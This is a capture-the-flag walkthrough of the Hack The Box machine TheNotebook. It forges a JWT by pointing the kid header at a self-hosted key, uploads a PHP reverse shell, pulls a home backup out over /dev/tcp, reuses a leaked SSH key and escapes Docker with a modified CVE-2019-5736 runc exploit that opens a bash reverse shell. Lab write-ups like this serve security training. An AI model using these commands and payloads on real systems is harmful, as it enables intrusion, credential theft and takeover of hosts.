Hack-The-Box-walkthrough[TheNotebook]

Posted on 2021-03-09 Edited on 2021-08-01 In HackTheBox walkthrough Views: Word count in article: 1.9k Reading time ≈ 7 mins.

introduce

OS: Linux
Difficulty: Medium
Points: 30
Release: 06 Mar 2021
IP: 10.10.10.230

information gathering

first use nmap as usaul

┌──(root💀kali)-[~/hackthebox/machine/thenotebook]
└─# nmap -sV -v -p- --min-rate=10000 10.10.10.230
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp    open     http    nginx 1.14.0 (Ubuntu)
10010/tcp filtered rxapi
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

webpage

egister, write notes, and it will assign a uuid and a cookie

request pkg:

POST /a22c35fe-ccb9-4128-971a-0f96e2b9108d/notes/add HTTP/1.1

Host: 10.10.10.230

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 20

Origin: http://10.10.10.230

Connection: close

Referer: http://10.10.10.230/a22c35fe-ccb9-4128-971a-0f96e2b9108d/notes/add

Cookie: auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Imh0dHA6Ly9sb2NhbGhvc3Q6NzA3MC9wcml2S2V5LmtleSJ9.eyJ1c2VybmFtZSI6Imx1Y2lmZXIxMSIsImVtYWlsIjoiMTE4NTE1MTg2N0BxcS5jb20iLCJhZG1pbl9jYXAiOjB9.i2HuA6-7YK2MniK6nuBOrwxvGRgJf0cZkUif2bNYN77BSZBkuqOducOZI-BuAGPZKrLelZhecaZxVW1OtsaTuM0-fyz48ar5I34K78FDazAtgWbuIb8atjZQG2Vo3OAFO4gv4Jlys5Vl8V7XZSgdW_DrJt8pSL0nSajDAG5dQCwlv0phweF19KifvADNQGlo_woN7QsK25lsp8LQIUdVn2jj0q7B0V1h7gLu7lIs1r9YhZrpmMG-Q0cnCscnN6o-IwnwP4h4SjHEQWBLPuhbCw9yodvJhzKo_hqIGASha98NjXgt43ruBaPSCPlJEaLNnfilQbC9jkLjiEQyifQmh62VptzBLVrgaUwKcxBkalJdyt8UUCw_77dTMXr202QsS-05wFkWVd_03yKgQFNL2whlIwKa_F5jyclxRa8SWJ3CQrM0PMhLPPzhp4XKvGGo00OJjLHodwV0EEVq1VrunsnFEkp-yg81Ms0z8_fejSWCoqdVaThf6uuK-_XpvS49pV8tnkvUa3U4slnJqhk2LaUuW3CGGGXTRvbEw1CVQPcrK64tIZzzVm7iT05sybOUBJIQGVcYsWbGfrvwitPBxrKXTlFpau5cxv9M5MkfjcDMl5qh0-xUAcH4qv5TO18BFRVvNosbmdPkIyibbBhSMTTd_ZRJlZyvBHP1LItD6lg; uuid=a22c35fe-ccb9-4128-971a-0f96e2b9108d

Upgrade-Insecure-Requests: 1



title=test&note=test

uuid:

1	a22c35fe-ccb9-4128-971a-0f96e2b9108d

cookie:

auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Imh0dHA6Ly9sb2NhbGhvc3Q6NzA3MC9wcml2S2V5LmtleSJ9.eyJ1c2VybmFtZSI6Imx1Y2lmZXIxMSIsImVtYWlsIjoiMTE4NTE1MTg2N0BxcS5jb20iLCJhZG1pbl9jYXAiOjB9.i2HuA6-7YK2MniK6nuBOrwxvGRgJf0cZkUif2bNYN77BSZBkuqOducOZI-BuAGPZKrLelZhecaZxVW1OtsaTuM0-fyz48ar5I34K78FDazAtgWbuIb8atjZQG2Vo3OAFO4gv4Jlys5Vl8V7XZSgdW_DrJt8pSL0nSajDAG5dQCwlv0phweF19KifvADNQGlo_woN7QsK25lsp8LQIUdVn2jj0q7B0V1h7gLu7lIs1r9YhZrpmMG-Q0cnCscnN6o-IwnwP4h4SjHEQWBLPuhbCw9yodvJhzKo_hqIGASha98NjXgt43ruBaPSCPlJEaLNnfilQbC9jkLjiEQyifQmh62VptzBLVrgaUwKcxBkalJdyt8UUCw_77dTMXr202QsS-05wFkWVd_03yKgQFNL2whlIwKa_F5jyclxRa8SWJ3CQrM0PMhLPPzhp4XKvGGo00OJjLHodwV0EEVq1VrunsnFEkp-yg81Ms0z8_fejSWCoqdVaThf6uuK-_XpvS49pV8tnkvUa3U4slnJqhk2LaUuW3CGGGXTRvbEw1CVQPcrK64tIZzzVm7iT05sybOUBJIQGVcYsWbGfrvwitPBxrKXTlFpau5cxv9M5MkfjcDMl5qh0-xUAcH4qv5TO18BFRVvNosbmdPkIyibbBhSMTTd_ZRJlZyvBHP1LItD6lg;

looking up about auth cookie I found jwt, lets see that too, what that is.

1	https://jwt.io/

upon pasting the token..
we get something interesting…

HEADER:

{
  "typ": "JWT",
  "alg": "RS256",
  "kid": "http://localhost:7070/privKey.key"
}

PAYLOAD:

{
  "username": "lucifer11",
  "email": "1185151867@qq.com",
  "admin_cap": 0
}

VERIFY SIGNATURE:

RSASHA256(
  base64UrlEncode(header) + "." +
  base64UrlEncode(payload),
  
  ...

  ...
)

its using keys for the auth (prob. gpg keys) and kid at port 7070

Navigating RS256 and JWKS

on researching and from the jwt.io itself, we can create out own token for auth..

lets create one and exploit it.
create a new rsa key pair

jwtRS256.sh

┌──(root💀kali)-[~/hackthebox/machine/thenotebook]
└─# ssh-keygen -t rsa -b 4096 -m PEM -f jwtRS256.key
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in jwtRS256.key
Your public key has been saved in jwtRS256.key.pub
The key fingerprint is:
SHA256:SS1PrGQQT5jFz4OlkxA7O9gn5zFde0t9jBr26pulXvg root@kali
The key's randomart image is:
+---[RSA 4096]----+
|      +Bo        |
|      +=.o.      |
|      o.*B+ .    |
|     o *=B+. . + |
|    . = S.o.+ + +|
|       * o . B ..|
|        .   o =  |
|             B   |
|           oB.E  |
+----[SHA256]-----+
┌──(root💀kali)-[~/hackthebox/machine/thenotebook]
└─# openssl rsa -in jwtRS256.key -pubout -outform PEM -out jwtRS256.key.pub
writing RSA key
┌──(root💀kali)-[~/hackthebox/machine/thenotebook]
└─# cat jwtRS256.key
-----BEGIN RSA PRIVATE KEY-----
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
-----END RSA PRIVATE KEY-----
┌──(root💀kali)-[~/hackthebox/machine/thenotebook]
└─# cat jwtRS256.key.pub                                                                                                        
-----BEGIN PUBLIC KEY-----
MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAvI/xUwgbHsfS7jZa7vCu
6NsGOZLqjWGMfY3JhL3O10SSe9CDY4VB0DtHA2Y8yKA1C1hjI2odVgvxmcLgvylh
Uccd/Fgo2CENr5Ez/K5nbPkMSG8K373AspZjx4jvM25G/K9EX1bh5PWt/mH8G/Sg
r4G0D1JqFbro0p6UK7gdzw/OG3kHhz4vUKK8sq/ueZBi8Dhu78UhDqUkROQYmdo+
TeF4AAN7ZWYx1DebEq+u47opdqwT60NUmbA+qccc8vdsFwERpcE1eYg6JVRyZUTH
8cF6shelSpeTtluvBG+9NvNhPOzZPW56gMG4Q3lw/5YeUiZMRaOTcKk+fk9Issbo
s2UuN1I0omFxMNVKjRSK/+EN69LKui35KpaHpqiZ3tJlHtebN9WURIsd0KV+3r/1
Z1h3fMQh1gXlDKy7ps8YqMDi2PiJKHj2tkQChIx8KwOvotb1k91jLGoPqYiJi2Iz
gURN/zSCFcr3EGAbZg1XmaIMmOV6F5S9LmU/v1YIB5TjDDPvdaFr/wPwZZd9fLkw
bS8zpNr1geICqcyGqv3cfTUjVf5gI0Z+j3qUNJLBGYRQu8FZ3yCi0m4ygrAn3vWy
yFWxk2ABwTry9cA2kZv8rhbxFuvG7i9ibF1sVHPxi21UrXtzFNKheVAJm+qs0G+j
v/fPmz07ZQXi9Gw8Lukz6IcCAwEAAQ==
-----END PUBLIC KEY-----

here now edit the payload and the details in jwt.io to the one matching to the original token, but change the localhost to your own tun0 ip, change admin_cap to true

And make sure the algorithm is set to RS256

It should look like this, signature verified.

before changing the cookie, change the priv key name to privKey.key as that is called on and spin the server on port 7070.

new cookie/token:(on the left)

eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Imh0dHA6Ly8xMC4xMC4xNC41OjcwNzAvcHJpdktleS5rZXkifQ.eyJ1c2VybmFtZSI6Imx1Y2lmZXIxMSIsImVtYWlsIjoiMTE4NTE1MTg2N0BxcS5jb20iLCJhZG1pbl9jYXAiOnRydWV9.Tv-XaYQuY71cIYcsBnYoDrrUUyDDs3u9Q-gIdkYVfZAFZJDn4EQYuQ0McwoPK_CX_puFmwiX7TzCqeL3y5tTlgZCeYKiaPo3fwRxr2LgmTAvoHMjXy-oD5VzgZWmutgPUtPEO5v7kRPrHM0etc-_f5HPNqpTXGJe1n0lSxipoc35X-MHWzhG3ymr41iN3aWQ8wcIJ2oFPKlcxadd8_l2byDYlnmGTU4_etYL48IG18ZRkDbDRE1LOiGId25LmjnHCblqFi5gDroL8DdyT-LuyqPYy1DCYSmkBHnnjZTCJWzKbPNv5JlnKC3Lr3JoLYZSaEFUbqYjnIScoBI5eaE5k54OLkQRRhDwxg33oxNiALiactRg_inHhhryCeBjSvqRfHDsutZj-WAwwSTDDl32N2n5TyXRzUuMteTTG087EzPMv694Y9twdIKEe5go2N0uTkcBBBGcRK7zE6Utx3011Gl45bd1a6WgVw1oyL1APAqsws60-P3UHEGdqLQbmSZSoHTrSWtvdEKEvDblYqMMgOIBX7pZRGFFYnbX_yr59FiLH8wDOpQ4wkOUgDfPKZaDWJUuqZOnzaAgOdOSKYl_L5ktzfwY704Dn9BVvnMGU4xM1S7wSM7020jQnC2VQukx1VyYgEAZzYAPWikkGxcDoFbh5sXTzLhmsn7oB9pASAs

change the token and our priv key is been picked

┌──(root💀kali)-[~/hackthebox/machine/thenotebook]
└─# ls                                                                                                                          
jwtRS256.key.pub  privKey.key
┌──(root💀kali)-[~/hackthebox/machine/thenotebook]
└─# python -m SimpleHTTPServer 7070                                                                                             
Serving HTTP on 0.0.0.0 port 7070 ...
10.10.10.230 - - [08/Mar/2021 23:26:41] "GET /privKey.key HTTP/1.1" 200 -

and now we are admin, (i edit the cookie auth parameter in firefox cookie editor plugin)

every refresh to the web page would request the privKey.key one time:

┌──(root💀kali)-[~/hackthebox/machine/thenotebook]
└─# python -m SimpleHTTPServer 7070                                                                                             
Serving HTTP on 0.0.0.0 port 7070 ...
10.10.10.230 - - [08/Mar/2021 23:26:41] "GET /privKey.key HTTP/1.1" 200 -
10.10.10.230 - - [08/Mar/2021 23:28:57] "GET /privKey.key HTTP/1.1" 200 -
10.10.10.230 - - [08/Mar/2021 23:29:01] "GET /privKey.key HTTP/1.1" 200 -

so don’t close the python SimpleHTTPServer.

and we can upload the files, i uploaded the php-reverse-shell.php, and got a reverse shell:

┌──(root💀kali)-[~/hackthebox/machine/thenotebook]
└─# nc -lvp 5566                                                                                                                
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::5566
Ncat: Listening on 0.0.0.0:5566
Ncat: Connection from 10.10.10.230.
Ncat: Connection from 10.10.10.230:50278.
Linux thenotebook 4.15.0-135-generic #139-Ubuntu SMP Mon Jan 18 17:38:24 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 04:37:59 up  9:48,  0 users,  load average: 0.08, 0.03, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data

user

In /var/backups/ there is home.tar.gz file

sending the file

1 2	www-data@thenotebook:/var/backups$ cat home.tar.gz > /dev/tcp/10.10.14.5/4444 cat home.tar.gz > /dev/tcp/10.10.14.5/4444

getting the tar.gz file

┌──(root💀kali)-[~/hackthebox/machine/thenotebook]
└─# nc -lvp 4444 > home.tar.gz                                                                                                  
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.230.
Ncat: Connection from 10.10.10.230:45076.

Unzipping we got the ssh keys

┌──(root💀kali)-[~/hackthebox/machine/thenotebook]
└─# tar -xvf home.tar.gz 
home/
home/noah/
home/noah/.bash_logout
home/noah/.cache/
home/noah/.cache/motd.legal-displayed
home/noah/.gnupg/
home/noah/.gnupg/private-keys-v1.d/
home/noah/.bashrc
home/noah/.profile
home/noah/.ssh/
home/noah/.ssh/id_rsa
home/noah/.ssh/authorized_keys
home/noah/.ssh/id_rsa.pub

give permission and ssh into the server, and get the user flag

┌──(root💀kali)-[~/hackthebox/machine/thenotebook]
└─# chmod 600 home/noah/.ssh/id_rsa                                                                                             
┌──(root💀kali)-[~/hackthebox/machine/thenotebook]
└─# ssh -i home/noah/.ssh/id_rsa noah@10.10.10.230                                                                              
The authenticity of host '10.10.10.230 (10.10.10.230)' can't be established.
ECDSA key fingerprint is SHA256:GHcgekaLnxmzAeBtBN8jWgd3DME3eniUb0l+PDmejDQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.230' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-135-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Mar  9 04:45:53 UTC 2021

  System load:  0.0               Processes:              182
  Usage of /:   42.1% of 7.81GB   Users logged in:        0
  Memory usage: 19%               IP address for ens160:  10.10.10.230
  Swap usage:   0%                IP address for docker0: 172.17.0.1


61 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Tue Mar  9 03:28:09 2021 from 10.10.14.41
noah@thenotebook:~$ id
uid=1000(noah) gid=1000(noah) groups=1000(noah)
noah@thenotebook:~$ whoami
noah
noah@thenotebook:~$ ls
home  user.txt
noah@thenotebook:~$ cat user.txt
c3f30f818132c77d26eae145351809ac

root

noah@thenotebook:~$ sudo -l
Matching Defaults entries for noah on thenotebook:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User noah may run the following commands on thenotebook:
    (ALL) NOPASSWD: /usr/bin/docker exec -it webapp-dev01*

searching for the exploit, the following website is interesting

CVE-2019-5736-PoC

now there change the exploit in var payload =

for getting the reverse shell

1	var payload = "#!/bin/bash \n echo 'bash -i >& /dev/tcp/10.10.14.5/4322 0>&1' > /tmp/rev.sh && chmod +x /tmp/rev.sh && bash /tmp/rev.sh"

build it go build main.go

now go to the machine, get into the docker container

┌──(root💀kali)-[~/hackthebox/machine/thenotebook]
└─# go build main.go 
┌──(root💀kali)-[~/hackthebox/machine/thenotebook]
└─# ls
home  home.tar.gz  jwtRS256.key.pub  main  main.go  php-reverse-shell.php  privKey.key
┌──(root💀kali)-[~/hackthebox/machine/thenotebook]
└─# mv main exp
┌──(root💀kali)-[~/hackthebox/machine/thenotebook]
└─# ls
exp  home  home.tar.gz  jwtRS256.key.pub  main.go  php-reverse-shell.php  privKey.key

1 2	noah@thenotebook:~$ sudo /usr/bin/docker exec -it webapp-dev01 bash root@396a6d12aaa7:/opt/webapp#

and in /tmp/ wget the main executable.
give executable permission and run the file

┌──(root💀kali)-[~/hackthebox/machine/thenotebook]
└─# python -m SimpleHTTPServer 81
Serving HTTP on 0.0.0.0 port 81 ...
10.10.10.230 - - [09/Mar/2021 00:16:57] "GET /exp HTTP/1.1" 200 -

root@396a6d12aaa7:/tmp# wget http://10.10.14.5:81/exp
--2021-03-09 05:20:01--  http://10.10.14.5:81/exp
Connecting to 10.10.14.5:81... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2236814 (2.1M) [application/octet-stream]
Saving to: ‘exp’

exp                             100%[=======================================================>]   2.13M   365KB/s    in 6.0s    

2021-03-09 05:20:07 (365 KB/s) - ‘exp’ saved [2236814/2236814]

root@396a6d12aaa7:/tmp# ls
exp  requirements.txt  webapp.db
root@396a6d12aaa7:/tmp# chmod 777 exp
root@396a6d12aaa7:/tmp# ./exp
[+] Overwritten /bin/sh successfully
[+] Found the PID: 1091
[+] Successfully got the file handle
[+] Successfully got write handle &{0xc00004d4a0}

and simultaneously open second ssh session, and ssh into it, and run:

┌──(root💀kali)-[~/hackthebox/machine/thenotebook]
└─# ssh -i home/noah/.ssh/id_rsa noah@10.10.10.230
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-135-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Mar  9 05:32:53 UTC 2021

  System load:  0.29              Processes:              207
  Usage of /:   42.2% of 7.81GB   Users logged in:        1
  Memory usage: 21%               IP address for ens160:  10.10.10.230
  Swap usage:   0%                IP address for docker0: 172.17.0.1

  => There is 1 zombie process.


61 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Tue Mar  9 05:23:22 2021 from 10.10.14.5
noah@thenotebook:~$ sudo /usr/bin/docker exec -it webapp-dev01 sh
No help topic for '/bin/sh'

as per our payload, listen on the port for rev connection
got root

└─# nc -lvp 4322
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4322
Ncat: Listening on 0.0.0.0:4322
Ncat: Connection from 10.10.10.230.
Ncat: Connection from 10.10.10.230:37578.
bash: cannot set terminal process group (68630): Inappropriate ioctl for device
bash: no job control in this shell
<da0ce3c741b77d5a95dafd4f680fc443d94bcad9564fce056# whoami
whoami
root
<da0ce3c741b77d5a95dafd4f680fc443d94bcad9564fce056# pwd
pwd
/run/docker/containerd/daemon/io.containerd.runtime.v1.linux/moby/ebd846222421782da0ce3c741b77d5a95dafd4f680fc443d94bcad9564fce056
<da0ce3c741b77d5a95dafd4f680fc443d94bcad9564fce056# cd /root
cd /root
root@thenotebook:/root# ls
ls
cleanup.sh
docker-runc
reset.sh
root.txt
start.sh
root@thenotebook:/root# cat root.txt
cat root.txt
4de72defc1cf5263e34f67acc80c6018

1
2
3

root@thenotebook:/root# cat /etc/shadow
cat /etc/shadow
root:$6$OZ7vREXE$yXjcCfK6rhgAfN5oLisMiB8rE/uoZb7hSqTOYCUTF8lNPXgEiHi7zduz1mrTWtFnhKOCZA9XZu12osORyYnKF.:18670:0:99999:7:::

Summary of knowledge

jwt cookie auth parameter forge
.ssh id_rsa key leak
Docker escapes from the sandbox
modify golang CVE-2019-5736-PoC to get a reverse shell

Contact me

QQ: 1185151867
twitter: https://twitter.com/fdlucifer11
github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security reseacher, hacker, bug hunter and more…